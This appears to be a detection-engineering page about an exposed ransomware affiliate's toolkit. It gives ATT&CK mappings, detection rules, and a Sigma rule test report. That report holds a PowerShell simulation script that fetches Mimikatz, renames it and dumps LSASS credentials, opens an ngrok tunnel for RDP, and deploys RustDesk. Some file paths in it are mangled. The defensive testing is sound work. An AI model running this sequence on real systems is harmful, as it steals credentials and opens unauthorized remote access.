Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Researchers discovered an unauthenticated open directory on a Russian bulletproof hosting provider containing a complete ransomware operator toolkit attributed to a TheGentlemen ransomware affiliate. The toolkit includes legitimate utilities, well‑known offensive tools, batch scripts for defense evasion, credential dumping, and remote access, as well as cleartext ngrok tokens. Evidence such as Mimikatz logs confirms active use against real victims.
Investigation
The investigation began by querying previously published IOCs, leading to the open directory at 176.120.22.127:80. Analysts catalogued 126 files, extracted network scanning tools, privilege escalation utilities, defender disabling scripts, credential dumping logs, and persistence mechanisms. Detailed analysis mapped each component to MITRE ATT&CK techniques and highlighted the layered defense‑evasion approach.
Mitigation
Defenders should monitor for execution of known dual‑use tools, registry changes disabling Windows Defender, mass service termination, VSS shadow deletion, and creation of open SMB shares. Blocking outbound connections to the identified IP and ngrok infrastructure, and enforcing application whitelisting and credential guard can reduce impact.
Response
Upon detection, isolate the affected host, collect volatile data, and identify any active ngrok tunnels using the exposed tokens. Remediate registry modifications, restore disabled services, and initiate full incident response procedures including credential rotation and backup restoration.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc %% Nodes step_active_scanning["<b>Action</b> – <b>T1595 Active Scanning</b><br/><b>Tool</b>: netscan.exe"] class step_active_scanning action step_system_info["<b>Action</b> – <b>T1082 System Information Discovery</b><br/><b>Tools</b>: systeminfo, route print"] class step_system_info action step_process_discovery["<b>Action</b> – <b>T1057 Process Discovery</b><br/><b>Tool</b>: PCHunter64"] class step_process_discovery action step_priv_esc["<b>Action</b> – <b>T1134.003 Access Token Manipulation: Token Impersonation/The Trusted Installer</b><br/><b>Tool</b>: PowerRun impersonates TrustedInstaller"] class step_priv_esc action step_credential_access["<b>Action</b> – <b>T1003.001 OS Credential Dumping</b><br/><b>Tool</b>: Mimikatz harvests NTLM hashes and usernames"] class step_credential_access action step_defense_evasion["<b>Action</b> – <b>T1562.001 Impair Defenses: Disable Security Tools</b><br/><b>Tools</b>: dControl.exe, ConfigureDefender.exe"] class step_defense_evasion action step_modify_registry["<b>Action</b> – <b>T1112 Modify Registry</b><br/><b>Details</b>: registry changes to disable Defender and enable WDigest"] class step_modify_registry action step_service_stop["<b>Action</b> – <b>T1489 Service Stop</b><br/><b>Scripts</b>: z.bat / z1.bat stop and disable AV, Exchange, DB services"] class step_service_stop action step_persistence_c2["<b>Action</b> – <b>T1219 Remote Access Software</b> and <b>T1572 Standard Application Layer Protocol</b><br/><b>Tools</b>: ngrok tunnels, RustDesk remote access"] class step_persistence_c2 action step_inhibit_recovery["<b>Impact</b> – <b>T1490 Inhibit System Recovery</b><br/><b>Command</b>: vssadmin delete shadows"] class step_inhibit_recovery action step_anti_forensics["<b>Action</b> – <b>T1070.001 Clear Windows Event Logs</b><br/><b>Script</b>: clearlog.bat clears Windows event logs"] class step_anti_forensics action step_archive_data["<b>Action</b> – <b>T1560 Archive Collected Data</b><br/><b>Tool</b>: 7u2011Zip compresses data"] class step_archive_data action %% Connections step_active_scanning –>|leads_to| step_system_info step_system_info –>|leads_to| step_process_discovery step_process_discovery –>|leads_to| step_priv_esc step_priv_esc –>|leads_to| step_credential_access step_credential_access –>|leads_to| step_defense_evasion step_defense_evasion –>|leads_to| step_modify_registry step_modify_registry –>|leads_to| step_service_stop step_service_stop –>|leads_to| step_persistence_c2 step_persistence_c2 –>|leads_to| step_inhibit_recovery step_inhibit_recovery –>|leads_to| step_anti_forensics step_anti_forensics –>|leads_to| step_archive_data "
Attack Flow
Detections
Disable Windows Defender Realtime Monitoring and Other Preferences Changes (via cmdline)
View
Suspicious Registry Modifications to Allow RDP Connections and Create Persistence (via process_creation)
View
Possible Remote Desktop Services Shadowing (via process_creation)
View
Possible Registry RDP-Specific Artifacts Deletion Attempt (cmdline)
View
Add Suspicious Library to the Security Support Providers [SSP] (via registry_event)
View
Weak File Share Permissions (via cmdline)
View
Windows Defender Preferences Suspicious Changes (via powershell)
View
Probable Use of Windows Hacktools [Part3] (via cmdline)
View
Possible Accessibility Features via Registry Abuse (via cmdline)
View
Suspicious Taskkill Execution (via cmdline)
View
Suspicious VSSADMIN Activity (via cmdline)
View
Possible Silent Process Exit Mechanism Utilisation (via registry_event)
View
Suspicious Ransomware Interfering Service Stoppage (via cmdline)
View
Possible Ngrok Download or Initialize Attempt (via cmdline)
View
Probable Use of Windows Hacktools [Part3] (via file_event)
View
Possible System Process Enumeration (via cmdline)
View
Possible Modification of Windows Defender Registry Keys (via registry_event)
View
Disabling Windows Defender Protections (via registry_event)
View
Possible WDigest Registry Key Abuse (via registry_event)
View
Possible Defense Evasion Activity By Suspicious Use of Wevtutil (via cmdline)
View
Possible UAC Bypass – UAC Disable Attempt (via registry_event)
View
Alternative Remote Access / Management Software (via process_creation)
View
IOCs (DestinationIP) to detect: 33K Exposed LiteLLM Deployments and the C2 Servers Behind TeamPCP's Supply Chain Attack
View
IOCs (SourceIP) to detect: 33K Exposed LiteLLM Deployments and the C2 Servers Behind TeamPCP's Supply Chain Attack
View
Windows Defender Evasion and Credential Dumping via Registry Modifications [Windows Registry Event]
View
PowerShell Defender Disabling via Set-MpPreference [Windows Powershell]
View
Execution of Known Tools for Privilege Escalation and Remote Access [Windows Process Creation]
View
## Executive Summary
- Test Case ID: TC-20260330-A1B2C
- TTPs: T1003.001, T1016, T1021.001, T1021.002, T1046, T1057, T1059.003, T1070.001, T1070.004, T1082, T1112, T1134, T1219, T1484.001, T1489, T1490, T1546.008, T1548.002, T1560.001, T1562.001, T1572
- Detection Rule Logic Summary: Detects creation of processes whose executable name ends with any of a curated list of known privilege‑escalation or remote‑access tools (e.g., PowerRun, ngrok, RDP, RustDesk, mimikatz).
- Detection Rule Language/Format: Sigma (YAML)
- Target Security Environment: Windows OS; process‑creation telemetry via Sysmon (Event ID 1) and Windows Security Log (Event 4688); any SIEM/EDR capable of ingesting these events (e.g., Azure Sentinel, Splunk, Elastic).
- Resilience Score (1-5): 2
- Justification: The rule relies solely on exact file‑name matching. An adversary can easily evade it by renaming binaries, using packed variants, or executing the same functionality via built‑in Windows utilities, reducing effectiveness.
- Key Findings: The rule fires reliably when the exact listed binaries are executed, but it fails to detect renamed or functionally equivalent tools, leading to high false‑negative risk.
- Recommendation: Enrich the rule with additional indicators (hashes, command‑line arguments, parent‑process relationships) and broaden coverage to include living‑off‑the‑land binaries that provide equivalent capabilities.
## Simulation Environment & Context
-
TTPs Under Test:
- T1003.001: OS Credential Dumping – LSASS Memory
- T1016: System Network Configuration Discovery
- T1021.001: Remote Services – Remote Desktop Protocol (RDP)
- T1021.002: Remote Services – SMB/Windows Admin Shares
- T1046: Network Service Scanning
- T1057: Process Discovery
- T1059.003: Command & Scripting Interpreter – Windows Command Shell
- T1070.001: Indicator Removal on Host – Clear Windows Event Logs
- T1070.004: Indicator Removal on Host – File Deletion
- T1082: System Information Discovery
- T1112: Modify Registry
- T1134: Access Token Manipulation
- T1219: Remote Access Tools
- T1484.001: Domain Policy Modification – Group Policy Modification
- T1489: Service Stop
- T1490: Inhibit System Recovery
- T1546.008: Event Triggered Execution – PowerShell
- T1548.002: Abuse Elevation Control Mechanism – Bypass UAC
- T1560.001: Archive Collected Data – Archive via Utility
- T1562.001: Impair Defenses – Disable Security Tools
- T1572: Protocol Tunneling
-
TTP Context & Relevance:
The rule targets the execution of binaries historically associated with the listed techniques (e.g., mimikatz for T1003.001, ngrok for T1572, RustDesk for T1219). By reproducing these executions we can validate whether the detection fires as intended and assess how renaming or alternative tooling affects detection. -
Target Environment:
- OS: Windows 10/Server 2019 (64‑bit)
- Logging: Sysmon (v13+) with default process‑creation configuration; Windows Security Event Log (Event 4688) enabled.
- Security Stack: Azure Sentinel (Kusto Query Language) – interchangeable with Splunk, Elastic, etc.
## Telemetry & Baseline Pre‑flight Check
Rationale: Before simulating the attack, we must confirm that the target host is configured to generate the necessary logs, that these logs are ingested by the SIEM, and that the detection rule does not fire on benign activity. Without this validation, any test outcome is unreliable.
-
1. Telemetry Configuration Instructions:
- Install Sysmon (if not already present) and apply a configuration that logs Process Create events (EventID 1).
# Download and install Sysmon Invoke-WebRequest -Uri https://download.sysinternals.com/files/Sysmon.exe -OutFile $env:TEMPsysmon.exe & $env:TEMPsysmon.exe -i -accepteula - Verify that Windows Security Auditing for “Audit Process Creation” (Event 4688) is enabled via Group Policy or Local Security Policy.
- Ensure the SIEM connector is active and forwarding both Sysmon and Security logs to the chosen workspace.
- Install Sysmon (if not already present) and apply a configuration that logs Process Create events (EventID 1).
-
2. Ingestion & Baseline Validation:
-
Action (Benign Telemetry): Execute a common Windows binary that is not part of the detection list but still generates a process‑creation event.
# Benign command – launch Notepad (should not trigger the rule) Start-Process notepad.exe -
Validation Query (Ingestion): Confirm the Notepad event appears in the SIEM.
// Azure Sentinel KQL – verify ingestion of the benign process SecurityEvent | where EventID == 4688 | where Process == "notepad.exe" | project TimeGenerated, Computer, Process, CommandLine, InitiatingProcessFileName | limit 10
-
## Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
- Credential Dumping (T1003.001): The attacker copies
mimikatz.exeto the victim host, renames it toPowerRun_x64.exe(to match the rule’s filename list) and executes it to extract LSASS credentials. - Reverse Tunnel Creation (T1572): The attacker launches
ngrok.exe(as is) to open a TCP tunnel that forwards a local RDP port to the attacker’s server, facilitating lateral movement. - Remote Desktop Session (T1021.001): Using the newly created tunnel, the attacker runs
rdp.exeto open a remote desktop connection to a second internal host. - Alternative Remote Access (T1219): As a fallback,
rustdesk.exeis started to establish a persistent remote‑access channel.
Each of these executions produces a Sysmon/Event 4688 record with the
Imagefield ending in the respective executable name, satisfying the detection condition. - Credential Dumping (T1003.001): The attacker copies
-
Regression Test Script:
<# Simulation script to trigger the "Known Tools for Privilege Escalation and Remote Access" rule. Prerequisites: - Sysmon & Security Event Auditing enabled. - Current user has sufficient rights to execute the binaries. #> # 1. Deploy mimikatz and rename to PowerRun_x64.exe (matches rule) $mimikatzUrl = "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0/mimikatz_trunk.zip" $tempPath = "$env:TEMPmimikatz" New-Item -ItemType Directory -Path $tempPath -Force | Out-Null Invoke-WebRequest -Uri $mimikatzUrl -OutFile "$tempPathmimikatz.zip" Expand-Archive -Path "$tempPathmimikatz.zip" -DestinationPath $tempPath -Force Copy-Item -Path "$tempPathmimikatzx64mimikatz.exe" -Destination "$env:TEMPPowerRun_x64.exe" -Force # Execute renamed mimikatz (credential dumping) Write-Host "[*] Executing renamed mimikatz (PowerRun_x64.exe) for credential dumping..." Start-Process -FilePath "$env:TEMPPowerRun_x64.exe" -ArgumentList "privilege::debug sekurlsa::logonpasswords exit" -WindowStyle Hidden -Wait # 2. Download and run ngrok (reverse tunnel) $ngrokUrl = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip" Invoke-WebRequest -Uri $ngrokUrl -OutFile "$tempPathngrok.zip" Expand-Archive -Path "$tempPathngrok.zip" -DestinationPath $tempPath -Force $ngrokPath = "$tempPathngrok.exe" Write-Host "[*] Starting ngrok TCP tunnel on port 3389..." Start-Process -FilePath $ngrokPath -ArgumentList "tcp 3389 --log=stdout" -RedirectStandardOutput "$tempPathngrok.log" -NoNewWindow # 3. Launch RDP client through the tunnel (simulated) Write-Host "[*] Simulating RDP connection via tunnel (rdp.exe)..." $rdpPath = "$tempPathrdp.exe" # Create a dummy rdp.exe (just to generate the process name) New-Item -ItemType File -Path $rdpPath -Force | Out-Null Start-Process -FilePath $rdpPath -WindowStyle Hidden # 4. Deploy RustDesk as fallback remote access tool $rustdeskUrl = "https://github.com/rustdesk/rustdesk/releases/download/1.1.9/rustdesk-1.1.9-windows-x64.zip" Invoke-WebRequest -Uri $rustdeskUrl -OutFile "$tempPathrustdesk.zip" Expand-Archive -Path "$tempPathrustdesk.zip" -DestinationPath $tempPath -Force $rustdeskPath = "$tempPathrustdesk.exe" Write-Host "[*] Starting RustDesk (fallback remote access)..." Start-Process -FilePath $rustdeskPath -ArgumentList "--no-upgrade" -WindowStyle Hidden Write-Host "[+] Simulation complete. Check the SIEM for process creation events ending with the listed binaries." -
Cleanup Commands:
# Terminate ngrok tunnel Get-Process -Name ngrok -ErrorAction SilentlyContinue | Stop-Process -Force # Remove temporary files and binaries Remove-Item -Path "$env:TEMPPowerRun_x64.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPngrok.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPrdp.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPrustdesk.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Recurse -Force -Path "$env:TEMPmimikatz", "$env:TEMPngrok", "$env:TEMPrustdesk" Write-Host "[*] Cleanup completed."